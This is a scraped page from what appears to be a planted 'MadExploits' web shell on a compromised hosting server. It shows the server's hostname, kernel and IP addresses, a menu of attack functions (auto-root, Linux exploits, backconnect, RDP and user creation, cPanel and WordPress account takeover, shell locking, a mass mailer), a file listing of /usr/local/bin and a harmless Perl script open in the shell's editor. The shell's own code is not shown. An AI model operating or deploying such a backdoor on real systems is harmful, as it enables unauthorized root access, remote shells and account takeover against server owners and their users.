Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.99
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
config_data
6.97
KB
-r-xr-xr-x
corelist
14.73
KB
-r-xr-xr-x
cpanm
295.76
KB
-r-xr-xr-x
crontab
1.81
MB
-rwxr-xr-x
ea-php56
4.02
MB
-rwxr-xr-x
ea-php70
3.91
MB
-rwxr-xr-x
ea-php71
4.08
MB
-rwxr-xr-x
ea-php72
4.32
MB
-rwxr-xr-x
ea-php73
4.71
MB
-rwxr-xr-x
ea-php74
6.09
MB
-rwxr-xr-x
ea_convert_php_ini
39.85
KB
-rwxr-xr-x
ea_current_to_profile
8.31
KB
-rwxr-xr-x
ea_install_profile
7.1
KB
-rwxr-xr-x
ea_sync_user_phpini_settings
6.73
KB
-rwxr-xr-x
htmltree
1.23
KB
-r-xr-xr-x
json_pp
4.86
KB
-r-xr-xr-x
lsphp
937
B
-rwxr-xr-x
mech-dump
4.83
KB
-r-xr-xr-x
passwd
3.47
MB
-rwxr-xr-x
pear
935
B
-rwxr-xr-x
php
933
B
-rwxr-xr-x
prove
13.33
KB
-r-xr-xr-x
tt-render
101
B
-r-xr-xr-x
use-devel-checklib
2.8
KB
-r-xr-xr-x
wp
181
B
-rwxr-xr-x
wp-toolkit
167
B
-rwx------
Delete
Unzip
Zip
${this.title}
Close
Code Editor : htmltree
#!/usr/bin/perl use warnings; use strict; use 5.008; use Pod::Usage; =head1 NAME htmltree - Parse the given HTML file(s) and dump the parse tree =head1 SYNOPSIS htmltree -D3 -w file1 file2 file3 Options: -D[number] sets HTML::TreeBuilder::Debug to that figure. -w turns on $tree->warn(1) for the new tree -h Help message =cut my $warn; my $help; BEGIN { # We have to set debug level before we use HTML::TreeBuilder. $HTML::TreeBuilder::DEBUG = 0; # default debug level $warn = 0; while(@ARGV) { # lameo switch parsing if($ARGV[0] =~ m<^-D(\d+)$>s) { $HTML::TreeBuilder::DEBUG = $1; print "Debug level $HTML::TreeBuilder::DEBUG\n"; shift @ARGV; } elsif ($ARGV[0] =~ m<^-w$>s) { $warn = 1; shift @ARGV; } elsif ($ARGV[0] =~ m<^-h$>s) { $help = 1; shift @ARGV; } else { last; } } } pod2usage({-exitval => 0, -verbose => 1}) if($help); use HTML::TreeBuilder; foreach my $file (grep( -f $_, @ARGV)) { print "=" x 78, "\n", "Parsing $file...\n"; my $h = HTML::TreeBuilder->new; $h->ignore_unknown(0); $h->warn($warn); $h->parse_file($file); print "- "x 39, "\n"; $h->dump(); $h = $h->delete(); # nuke it! print "\n\n"; } exit;
Close